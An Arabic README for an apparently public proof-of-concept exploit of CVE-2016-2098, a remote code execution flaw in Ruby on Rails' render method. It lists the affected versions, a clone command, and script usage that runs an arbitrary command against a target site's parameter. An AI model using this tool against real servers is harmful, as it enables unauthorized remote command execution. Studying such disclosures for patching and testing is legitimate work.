
CVE-2016-2098 - برهان المفهوم (POC) لثغرة تنفيذ الأكواد عن بُعد (RCE) في Ruby on Rails: التحقق غير السليم من الإدخال (CVE-2016-2098) في bash. يمكن للمهاجمين عن بُعد تنفيذ أكواد Ruby عشوائية من خلال استغلال استخدام التطبيق غير المقيد لطريقة render.
Action Pack في Ruby on Rails قبل 3.2.22.2، و4.x قبل 4.1.14.2، و4.2.x قبل 4.2.5.2 يسمح للمهاجمين عن بُعد بتنفيذ كود Ruby عشوائي من خلال استغلال الاستخدام غير المقيّد لطريقة render في التطبيق (RCE)
https://nvd.nist.gov/vuln/detail/CVE-2016-2098
git clone https://github.com/Debalinax64/CVE-2016-2098.git
cd CVE-2016-2098
/bin/bash ruby-on-rail-RCE.sh < website> <target_uri> < command>
مثال: /bin/bash ruby-on-rail-RCE.sh "http://target.com" "pages?id" "pwd"